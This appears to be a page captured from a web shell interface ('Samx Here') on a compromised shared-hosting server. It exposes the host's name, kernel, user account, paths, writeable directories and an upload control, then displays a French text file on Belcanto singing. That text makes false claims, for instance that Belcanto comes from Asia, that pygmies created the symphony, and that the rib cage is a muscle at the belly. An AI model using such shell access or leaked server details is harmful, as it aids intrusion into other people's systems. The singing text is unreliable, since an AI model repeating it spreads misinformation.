Samx Here
n1udSecurity


Server : Apache
System : Linux webd348.cluster026.gra.hosting.ovh.net 5.15.148-ovh-vps-grsec-zfs-classid #1 SMP Thu Feb 8 09:41:04 UTC 2024 x86_64
User : hednacluml ( 122243)
PHP Version : 8.3.9
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
Directory :  /home/hednacluml/ecole/Audio/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/hednacluml/ecole/Audio/2018-01-07_Le-chant-Belcanto-full.txt
Le chant Belcanto consiste à transformer sa voix en un beau haut-parleur. Cette méthodologie de chant vient d'Asie, les italiens s'intéressant à l'Asie depuis les romains, dont l'élite parlait par ailleurs en grec en son sein. Les pygmées, nom venant du grec, ont créé la symphonie. Les européens ont créé le chef d'orchestre et les instruments baroques.
On vous dit qu'il faut aller au conservatoire pour bien chanter. Seulement, vous passerez beaucoup de temps à apprendre le solfège, au conservatoire. Avant de connaître les notes écrites, il est pourtant plus enrichissant de maîtriser sa voix, ou un instrument. Chanter donne de l'envie. Jouer de la musique et dialoguer permettent de continuer à lier dans son esprit, d'une manière différente pour chacun. La passion peut alors venir, si on aime ce qu'on a choisi.
Chanter consiste à créer une histoire. On appelle cela l'interprétation. Il s'agit de se laisser aller vers une invention sur ce qui nous parle dans l'histoire de la chanson, chanson que nous comprenons donc. Si on écrit, si on crée, on fait comme si on écrivait, comme si on créait la chanson. C'est à dire qu'on agit pour chanter. Alors notre chant prend de la valeur pour celui qui écoute.
Il faut d'abord connaître son registre de départ. On détermine si on est grave, baryton, ténor, alto, mezzo, soprano. Ces registres de voix vont du plus grave au plus aigu. Avec les débutants, il faudra toujours commencer sur le premier registre possible, le plus grave. Il y a les registres graves pour les hommes et les registres aigus pour les femmes, ou les enfants.
Pour transmettre le chant en belcanto, il faut connaître le piano et des thèmes. Ces derniers permettent de gagner en puissance. On chante So°°le ou Vi’toria, en montant et redescendant, pour appuyer, puis tenir en haut. Pour monter vers les aigus, il ne faut surtout pas monter sa voix vers le haut de la tête, comme beaucoup de débutants souhaitent faire. Il faut utiliser sa cage thoracique pour amener du souffle. La cage thoracique est le muscle situé au niveau du ventre. Pour tenir, il faut du soutien et de l’entraînement. On travaille alors le staccato. Cela consiste à délier les notes, en utilisant le diaphragme, organe situé en-dessous de la poitrine.
Après l'entraînement, on apprend en groupe, puis en canon, pour connaître l'autonomie. Il doit y avoir un métronome, ou un chef d'orchestre. Il existe d'autres exercices, demandant à comprendre son anatomie. Oserez-vous devenir un soliste ?

Mes notes

Trouver une association qui apprend par la méthode Belcanto, ou sans solfège.
Sinon, parlez de cela à des professeurs de chants de l'éducation populaire.

SAMX